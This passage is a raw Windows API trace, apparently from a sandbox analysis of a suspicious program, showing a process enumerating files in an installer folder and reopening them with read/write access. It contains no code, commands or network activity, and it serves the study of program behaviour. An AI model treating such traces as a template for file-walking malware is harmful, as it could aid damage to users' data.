ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46280, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䝘")) returned 0 [0061.498] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0061.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45f68 | out: hHeap=0x20000) returned 1 [0061.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0061.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0061.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.499] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.499] AreFileApisANSI () returned 1 [0061.499] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1053", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1053", lpUsedDefaultChar=0x0) returned 27 [0061.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.499] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.499] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.500] AreFileApisANSI () returned 1 [0061.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053") returned 27 [0061.500] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053" (normalized: "c:\\588bce7c90097ed212\\1053"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.500] GetLastError () returned 0x5 [0061.500] GetLastError () returned 0x5 [0061.500] SetLastError (dwErrCode=0x5) [0061.500] GetLastError () returned 0x5 [0061.500] SetLastError (dwErrCode=0x5) [0061.500] GetLastError () returned 0x5 [0061.500] SetLastError (dwErrCode=0x5) [0061.500] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.500] AreFileApisANSI () returned 1 [0061.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.500] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053") returned 27 [0061.500] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053" (normalized: "c:\\588bce7c90097ed212\\1053"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.500] GetLastError () returned 0x5 [0061.500] GetLastError () returned 0x5 [0061.500] SetLastError (dwErrCode=0x5) [0061.501] GetLastError () returned 0x5 [0061.501] SetLastError (dwErrCode=0x5) [0061.501] GetLastError () returned 0x5 [0061.501] SetLastError (dwErrCode=0x5) [0061.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.501] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0061.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.501] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0061.501] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1055", cAlternateFileName="")) returned 1 [0061.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.501] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.501] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0061.502] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.502] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0061.502] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0061.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.502] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0061.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfb0 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0061.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0061.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0061.503] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.503] AreFileApisANSI () returned 1 [0061.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1053\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1053\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.503] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.503] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.504] AreFileApisANSI () returned 1 [0061.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693f0 [0061.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x693f0, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 36 [0061.504] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.504] GetFileType (hFile=0x41c) returned 0x1 [0061.504] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0061.504] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.504] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.504] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.505] CloseHandle (hObject=0x41c) returned 1 [0061.505] AreFileApisANSI () returned 1 [0061.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 36 [0061.505] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.505] GetFileType (hFile=0x41c) returned 0x1 [0061.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.505] CloseHandle (hObject=0x41c) returned 1 [0061.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0061.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0061.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.505] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.505] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.506] AreFileApisANSI () returned 1 [0061.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0061.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df50, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1053\\eula.rtf") returned 36 [0061.506] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1053\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19)) returned 1 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.506] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0061.507] HeapFree (in: 